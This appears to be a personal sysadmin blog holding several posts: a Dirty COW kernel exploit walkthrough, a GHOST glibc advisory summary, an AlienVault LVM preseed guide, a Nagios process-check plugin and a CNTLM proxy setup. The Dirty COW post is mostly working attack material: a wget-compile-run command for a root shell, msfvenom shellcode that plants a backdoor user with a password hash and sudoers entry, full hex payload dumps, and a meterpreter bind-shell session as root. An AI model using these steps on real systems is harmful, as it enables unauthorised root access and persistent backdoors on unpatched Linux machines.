TomsBlog

Linux Kernel Dirty COW exploit POC examples

Mon, 24 Oct 2016 22:17:42 +0000

Dirty COW (CVE-2016-5195) is the latest vulnerability to be given a brand and is being dubbed the biggest privilege escalation vulnerability to date on Linux.

https://dirtycow.ninja/

The reason for all the hype is because of the amount of devices the vulnerability affects as it has been in the linux kernel since 2.6.22 (2007) and is easily exploitable reliably. That’s enough of the background info, follow the link above if you want to learn more.

The following example uses this exploit code https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679 which basically uses the vulnerability to overwrite the /usr/bin/passwd binary with our binary and then runs it. This runs our injected code as root due to the original binary having SUID set.

When running any of the POC’s available you will first need to turn “dirty_writeback_centisecs” off otherwise the kernel becomes unstable and crashes.

If you just want a root shell then you can just download, compile and run the above code to give you a bash shell.

wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c
gcc -pthread cowroot.c -o cowroot
./cowroot

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

NOTE: The gcc command will give you warnings which can be ignored.

The above gives us a stable shell where we can access any file we want.

The shellcode this exploit injects can be changed to perform other tasks

Add users
Get users hash
Add users to sudoers
Run meterpreter shells

The shell code can be created using msfvenom, the below creates shellcode which will add a new user and then add that user to sudoers.

msfvenom -p linux/x64/exec CMD="echo 0 > /proc/sys/vm/dirty_writeback_centisecs; useradd test2 -m -s /bin/bash; sed  's/test2.*:/test2:\$6\$TS7FNSkg\$tWUYOc5OWNe9bNMTdhXvzC2YSgkQsB\/pfumVfCbtCr6aRF3EurkF0liJkn0el34HgyAHXSjN\/ctQTLLmt56jb.:17098:0:99999:7:::/m' -i /etc/shadow; echo \"test2   ALL=(ALL:ALL) ALL\" >> /etc/sudoers.d/test; chown root.root /etc/sudoers.d/test;" PrependSetuid=True -f elf | xxd -i

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 383 bytes

  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xf7, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x76, 0x03, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  0x50, 0x01, 0x00, 0x00, 0x65, 0x63, 0x68, 0x6f, 0x20, 0x30, 0x20, 0x3e,
  0x20, 0x2f, 0x70, 0x72, 0x6f, 0x63, 0x2f, 0x73, 0x79, 0x73, 0x2f, 0x76,
  0x6d, 0x2f, 0x64, 0x69, 0x72, 0x74, 0x79, 0x5f, 0x77, 0x72, 0x69, 0x74,
  0x65, 0x62, 0x61, 0x63, 0x6b, 0x5f, 0x63, 0x65, 0x6e, 0x74, 0x69, 0x73,
  0x65, 0x63, 0x73, 0x3b, 0x20, 0x75, 0x73, 0x65, 0x72, 0x61, 0x64, 0x64,
  0x20, 0x74, 0x65, 0x73, 0x74, 0x32, 0x20, 0x2d, 0x6d, 0x20, 0x2d, 0x73,
  0x20, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x3b, 0x20,
  0x73, 0x65, 0x64, 0x20, 0x20, 0x27, 0x73, 0x2f, 0x74, 0x65, 0x73, 0x74,
  0x32, 0x2e, 0x2a, 0x3a, 0x2f, 0x74, 0x65, 0x73, 0x74, 0x32, 0x3a, 0x24,
  0x36, 0x24, 0x54, 0x53, 0x37, 0x46, 0x4e, 0x53, 0x6b, 0x67, 0x24, 0x74,
  0x57, 0x55, 0x59, 0x4f, 0x63, 0x35, 0x4f, 0x57, 0x4e, 0x65, 0x39, 0x62,
  0x4e, 0x4d, 0x54, 0x64, 0x68, 0x58, 0x76, 0x7a, 0x43, 0x32, 0x59, 0x53,
  0x67, 0x6b, 0x51, 0x73, 0x42, 0x5c, 0x2f, 0x70, 0x66, 0x75, 0x6d, 0x56,
  0x66, 0x43, 0x62, 0x74, 0x43, 0x72, 0x36, 0x61, 0x52, 0x46, 0x33, 0x45,
  0x75, 0x72, 0x6b, 0x46, 0x30, 0x6c, 0x69, 0x4a, 0x6b, 0x6e, 0x30, 0x65,
  0x6c, 0x33, 0x34, 0x48, 0x67, 0x79, 0x41, 0x48, 0x58, 0x53, 0x6a, 0x4e,
  0x5c, 0x2f, 0x63, 0x74, 0x51, 0x54, 0x4c, 0x4c, 0x6d, 0x74, 0x35, 0x36,
  0x6a, 0x62, 0x2e, 0x3a, 0x31, 0x37, 0x30, 0x39, 0x38, 0x3a, 0x30, 0x3a,
  0x39, 0x39, 0x39, 0x39, 0x39, 0x3a, 0x37, 0x3a, 0x3a, 0x3a, 0x2f, 0x6d,
  0x27, 0x20, 0x2d, 0x69, 0x20, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x73, 0x68,
  0x61, 0x64, 0x6f, 0x77, 0x3b, 0x20, 0x65, 0x63, 0x68, 0x6f, 0x20, 0x22,
  0x74, 0x65, 0x73, 0x74, 0x32, 0x20, 0x20, 0x20, 0x41, 0x4c, 0x4c, 0x3d,
  0x28, 0x41, 0x4c, 0x4c, 0x3a, 0x41, 0x4c, 0x4c, 0x29, 0x20, 0x41, 0x4c,
  0x4c, 0x22, 0x20, 0x3e, 0x3e, 0x20, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x73,
  0x75, 0x64, 0x6f, 0x65, 0x72, 0x73, 0x2e, 0x64, 0x2f, 0x74, 0x65, 0x73,
  0x74, 0x3b, 0x20, 0x63, 0x68, 0x6f, 0x77, 0x6e, 0x20, 0x72, 0x6f, 0x6f,
  0x74, 0x2e, 0x72, 0x6f, 0x6f, 0x74, 0x20, 0x2f, 0x65, 0x74, 0x63, 0x2f,
  0x73, 0x75, 0x64, 0x6f, 0x65, 0x72, 0x73, 0x2e, 0x64, 0x2f, 0x74, 0x65,
  0x73, 0x74, 0x3b, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05

We need the HEX code so copy the above and edit cowroot.c

NOTE: this is compiled for x86_64 so will not work on 32bit installations.

Change sc array to equal the above shell code and then change sc_len to equal the length of the above shell code in this case its 503.

As stated above this will create a new user and add them to sudoers. Sudoers configuration does not currently persist through a reboot and syncing writes to disk crashes the server.

Perform the previous steps to compile the code and run it. You can then use “test2” user account using password “test01”, to change this password you’ll need to change the hash in the shadow file or in the shell code.

Using Meterpreter

Instead of creating a user we can create a meterpreter payload and use dirty cow to run it as root. First we need to create the meterpreter payload again using msfvenom:

msfvenom -p linux/x86/meterpreter/bind_tcp -f elf -o meterpreter

Copy this new binary to your target, in my case i just coped it to the test account home space I was using above. We now need to generate the payload to put in the above cowroot, using the same payload we will just change the commands:

msfvenom -p linux/x86/exec -f elf PrependSetuid=True CMD="echo 0 > /proc/sys/vm/dirty_writeback_centisecs; /home/test/./meterpreter &" | xxd -i
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 118 bytes

  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xca, 0x00, 0x00, 0x00,
  0x40, 0x01, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x4c, 0x00, 0x00, 0x00,
  0x65, 0x63, 0x68, 0x6f, 0x20, 0x30, 0x20, 0x3e, 0x20, 0x2f, 0x70, 0x72,
  0x6f, 0x63, 0x2f, 0x73, 0x79, 0x73, 0x2f, 0x76, 0x6d, 0x2f, 0x64, 0x69,
  0x72, 0x74, 0x79, 0x5f, 0x77, 0x72, 0x69, 0x74, 0x65, 0x62, 0x61, 0x63,
  0x6b, 0x5f, 0x63, 0x65, 0x6e, 0x74, 0x69, 0x73, 0x65, 0x63, 0x73, 0x3b,
  0x20, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x74, 0x65, 0x73, 0x74, 0x2f,
  0x2e, 0x2f, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x70, 0x72, 0x65, 0x74, 0x65,
  0x72, 0x20, 0x26, 0x00, 0x57, 0x53, 0x89, 0xe1, 0xcd, 0x80

Compile and run as above and we can then connect to the meterpreter using msfconsole:

msf > use multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST                          no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set RHOST 192.168.57.10
RHOST => 192.168.57.10
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.57.10
[*] Meterpreter session 1 opened (192.168.57.11:42828 -> 192.168.57.10:4444) at 2016-11-06 15:40:54 +0000

You should now have a meterpreter shell as root.

GHOST glibc vulnerability CVE-2015-0235

Sat, 31 Jan 2015 12:26:56 +0000

A new dangerous and wide spread vulnerability has been found in the GNU C Library (glib) and has been nicknamed GHOST after the function that is affected, the real name for this is CVE-2015-0235.

The work carried out by Qualys (https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability) has found that certain functions in the library are vulnerable to a buffer overflow attack giving the attacker full remote access to the victim.

“During a code audit Qualys researchers discovered a buffer overflow in the __nss_hostname_digits_dots() function of glibc. This bug can be triggered both locally and remotely via all the gethostbyname() functions. Applications have access to the DNS resolver primarily through the gethostbyname() set of functions. These functions convert a hostname into an IP address.”

Its worth noting that these functions are not used for IPv6 and so this vulnerability only affects systems running IPv4. The library is only used on Linux as well so Windows and Mac OS are not affected.

Since glibc is used on a lot of linux systems this problem is widespread but the saving grace may be that it doesn’t affect all the software that use these libraries.

Affected Software

Some of the software the Qualys team found not to be vulnerable are:

Apache
mariadb/mysql
nfs-utils
openldap
openSSH
postfix
pure-ftpd
Samba
Sendmail
tcp_wrappers

One of the major pieces of software that is affected is Exim4 and should be patched immediately as Qualys have a working exploit which they will be releasing.

There are lots of other software that this affects but most distributions have released a fix for this so regardless if you think you’re vulnerable its best just to patch to make sure you aren’t.

If you do patch don’t forget to restart any affected software or best of all reboot the system to ensure all affected applications are restarted.

Distro Links

RedHat – https://access.redhat.com/security/cve/CVE-2015-0235

Debian – https://security-tracker.debian.org/tracker/CVE-2015-0235

Ubuntu – http://www.ubuntu.com/usn/usn-2485-1/

Alienvault LVM partitioning

Wed, 23 Apr 2014 22:15:22 +0000

Alienvault by default installs just one partition and in some cases errors on some installations, by editing the preseed file you can split the partitioning up with LVM and avoid any errors.

Best practice is to split up the filesystem in to separate sections so filling up /var does not corrupt the main root partition, doing this with LVM allows you to add extra disks later on.

As Alienvault can store a lot of data, utilising LVM is extremely useful so you can expand your partitions on the fly later on.

The Alienvault setup by default puts everything on just the root partition and doesn’t use LVM, this isn’t the best set up for expansion later on and makes its really difficult if you run out of disk space later on. Not only this but the install also doesn’t seem to play nicely with VMWare and some physical servers and produces the error “no root filesystem defined” see here. Luckily Alienvault is built on Debian so we can change the preseed file to automatically format the disk using LVM.

For the main USM server the preseed file is “/simple-cdd/defaultA.preseed” so we need to edit the partman section from line 38 to 127 just before the Bootloader section. We can then place the following in its place:

Preseed File

Partitioning.

d-i partman-auto/choose_recipe select boot-root

d-i partman-auto/disk string /dev/sda

d-i partman-auto/method string lvm

d-i partman-lvm/device_remove_lvm boolean true

d-i partman-md/device_remove_md boolean true

d-i partman-auto-lvm/no_boot boolean true

d-i partman-auto-lvm/new_vg_name string vg_VolumeGroup01

d-i partman-auto/expert_recipe string \
boot-root :: \
2048 2048 2048 linux-swap method{ swap } \
format{ } $lvmok{ } lv_name{ lv_swap } \
. \
5120 5120 5120 ext4 method{ lvm } \
$lvmok{ } mountpoint{ /var } lv_name{ lv_var } \
format{ } use_filesystem{ } filesystem{ ext4 } \
. \
5120 5120 5120 ext4 method{ lvm } \
$lvmok{ } mountpoint{ /home } lv_name{ lv_home } \
format{ } use_filesystem{ } filesystem{ ext4 } \
. \
8192 8192 8192 ext4 method{ lvm } \
$lvmok{ } mountpoint{ /usr } lv_name{ lv_usr } \
format{ } use_filesystem{ } filesystem{ ext4 } \
. \
1 10240 10000000000 ext4 method{ lvm } \
$lvmok{ } mountpoint{ / } lv_name{ lv_root } \
format{ } use_filesystem{ } filesystem{ ext4 } \
.

d-i partman-lvm/confirm_nooverwrite boolean true

d-i partman-lvm/confirm boolean true

d-i partman-partitioning/confirm_write_new_label boolean true

d-i partman/choose_partition select Finish

d-i partman/confirm_nooverwrite boolean true

d-i partman/confirm boolean true

Partitions

The above creates a volume group called vg_VolumeGroup01 on /dev/sda, it then creates 4 partitions with ext4 filesystems and a 5th partition for swap. Partition sizes will editing depending on the size of your disk or needs.

So the following partitions are made:

swap 2GB
/var 5GB
/home 5GB
/usr 8GB
/ Take up the rest of the filesystem

The rest of the options basically just make it so there is no prompt and the disk will be overwritten so be careful. You may also want to set the root to use a specific amount and for /var to take the rest as it will be the most heavily utilised.

Once you have edited this file save it to somewhere, you can then use an ISO editor to either upload the preseed file to a new file or overwrite the original.

If just adding the file back to the ISO with a seperate name you will need to press TAB and edit the grub command and set the preseed file to the correct place as below:

Alienvault Change Preseed File

There is also a preseed file for Sensor installation as well which is stored in “/simple-cdd/defaultB.preseed” you can follow the same procedure as above.

Check a process cpu and memory with Nagios

Sat, 18 Jan 2014 19:48:11 +0000

A check plugin for Nagios to monitor processes and their utilization of system resources.

https://github.com/thomasweaver/check_cpu_proc

This plugin takes in a process name and then uses the command ps to work out how much memory and cpu all the processes of that name are taking up in percentage. It will output performance data for CPU Usage Percentage, Memory Usage Percentage, VSZ, RSS and the number of processes of that name.

Options

Only the -p option is required all other options are optional.

-p allows you to specify the name of the process you want to monitor (REQUIRED)

-w specify a warning for CPU percentage utilization

-c specify a critical for CPU percentage utilization

-m specify a warning for Memory percentage utilization

-n specify a critical fro Memory percentage utilization

Examples

To monitor the apache processes and warn when the CPU uses over 20% and critical when over 30%

./check_cpu_proc.sh -p apache -w 20 -c 30

OK /usr/sbin/apache2 CPU: 0% MEM: 1.5% over 6 processes | proc=6 mem=1.5% cpu=0% rss=42116.0KB vsz=1274760.0KB

To monitor apache processes and warn when the CPU uses over 20% and critical when over 30% . Warn when memory is over 0.2% and Critical when memory is over 0.4%

./check_cpu_proc.sh -p apache -w 20 -c 30 -m 0.2 -n 0.4

CRITICAL /usr/sbin/apache2 CPU: 0% MEM: 1.5% over 6 processes | proc=6 mem=1.5% cpu=0% rss=42116.0KB vsz=1274760.0KB

To monitor nagios processes purely for performance data. i.e. no warning or criticals

./check_cpu_proc.sh -p nagios

OK /usr/lib/nagios/plugins/check_ping CPU: 0% MEM: 0% over 1 processes | proc=1 mem=0% cpu=0% rss=864.0KB vsz=12408.0KB

NOTE: this plugin doesn’t check whether the process is running and is purely for monitoring process utilization.

Nagios Graphs

Below is some examples of graphs created from the performance data output by the plugin:

The below graphs are of a apache process from a live system

Linux behind NTLM authentication proxy using CNTLM

Sat, 13 Oct 2012 18:16:57 +0000

Sometimes you will find your server sat behind a proxy designed for human traffic rather than server traffic and so requires authentication.

Although the NTLM protocol is grossly insecure it still seems to used in a lot of proxies. To get your server to download updates you will need to make your server play nice with this authentication as a lot of software does not support the NTLM protocol.

CNTLM solves this issue by adding another proxy layer in front of your software which does not require authentication.

You can download it from here http://cntlm.sourceforge.net/

We are installing this on CentOS so we need the RPM, for Ubuntu get the DEB file alternatively download the source code and compile it.

So on CentOS run:

rpm -i cntlm-0.92.3-1.x86_64.rpm

On Ubuntu run:

dpkg -i cntlm_0.92.3_amd64.deb

Once installed edit the configuration file /etc/cntlm.conf

Set the username to your domain username and set the domain:

Username proxyaccess

Domain contorso.com

Remove any passwords. Set the port you want it to listen on, the default is 3128 and set the proxy server you want to go through:

Listen 3128

Proxy 10.0.0.1:8080

All we need to do now is create the password hash:

cntlm -H -M http://10.0.0.1:8080 -c /etc/cntlm.conf

-H means create a hash, -M specifies the proxy server and -c specifies the config file to use.

You will be asked for your password type it and then a hash will be created like below:

—————————-[ Profile 1 ]——

Auth NTLM

PassNT 44345CE5DA10BCDF46CB34BAB4B5EEF6

PassLM BA46510ADEFAE56345ACC34156ADEE36

————————————————

Copy all of this output and past it into your configuration file. Now all you need to do is start cntlm:

cntlm -c /etc/cntlm.conf

If you get “Exiting with Error check the Logs”. Have a look in the logs

If you see this entry:

cntlm: Cannot bind port 3128: Address already in use!

CNTLM is already running have a look by running:

ps aux | grep cntlm
kill -9 PROCESSID

Where PROCESSID is the ID of the process you want to kill.

Now try and run CNTLM again and you should be done.

All you have to do now is point your programs to http://127.0.0.1:3128 for example for yum edit /etc/yum.conf and add:

proxy = http://127.0.0.1:3128

Now YUM should work. Dont forget to have a look in /var/log/messages or /var/log/syslog for any errors.